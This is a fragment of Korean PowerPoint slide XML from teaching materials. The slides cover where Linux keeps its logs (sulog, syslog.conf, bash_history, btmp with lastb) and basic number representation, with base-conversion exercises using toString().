                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a: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/var/log/anaconda.log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리눅스 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>설치시</a:t>
                      </a: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install </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>된 패키지나 과정에 대한 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>로그기록입니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a: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/var/log/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>sulog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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>su</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명령어를 통한 관리자 권한을 사용한 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>로그기록입니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>만약 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>var/log/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>sulog</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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파일이 없다면 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>vi /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>etc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>syslog.conf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> -&gt; authpriv.info /var/log/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>sulog</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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설정변경후</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>etc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>init.d</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>/syslog reload </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>명령으로 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>syslog</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>가 설정파일을 다시 읽게 합니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a: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/root/.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>bash_history</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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(root </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>유저의 경우</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18"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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>입력한 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>실행명령어</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 목록이 저장되는 로그입니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>-   history </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>명렁어로</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 내용을 확인 할 수 있습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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/var/log/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>btmp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실패한 로그인 시도를 기록하는 로그입니다</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바이너리 파일이며 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>lastb</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명령어로 확인 할 수 있습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>정보의 표현</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>컴퓨터기초</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="12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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>정보의표현</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="12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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> • </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>디지털 데이터</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="14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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>    - </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>비트</a:t>
                      </a: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바이트</a:t>
                      </a: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이진수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, 16</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>진수</a:t>
                      </a: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아스키 코드</a:t>
                      </a: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파일</a:t>
                      </a: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확장자</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>파일헤더</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="12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돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>실습</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="12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sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>정보의 표현</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t>100 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1"/>
              <a:t>만큼 사랑해</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>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t>난 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>(70 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1"/>
              <a:t>몸무게</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>/ 13</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1"/>
              <a:t>만큼 사랑해</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>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a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>100 - 3058 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>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sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>정보의 표현 </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진수</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>65450682</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>초를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>2, 4, 8,16 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>진수로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>구하시오</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" kern="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>toString</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함수를 쓴다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a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>답은 아래와 같다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>남은 시간을 변수로 입력한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>remain_time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>함수를 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>정보의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>표현 </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진수</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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>웅장해진다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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>.. 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>월 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>신데</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페이지를</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수정해야 겠다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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>수정하시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="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졸업 날짜</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졸업 날짜 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: 2023</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
